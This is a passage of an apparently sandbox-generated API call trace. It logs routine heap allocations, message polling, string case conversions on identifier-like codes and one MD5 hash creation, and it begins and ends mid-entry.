(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.485] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.485] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.485] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.486] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.486] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.486] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.486] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.486] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0198.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.486] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0198.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.487] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.487] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.488] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.488] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.488] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.488] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.488] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.488] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.488] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.488] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.489] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.489] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.489] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.489] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.489] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.489] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.489] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.489] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.489] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.490] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.490] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.490] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.490] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.490] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.490] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.490] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.491] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.491] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.491] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.491] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.491] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.492] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.492] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.506] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.506] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.507] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.507] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.508] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.508] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.508] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.508] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.509] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.509] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.509] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.509] RtlAllocateHeap 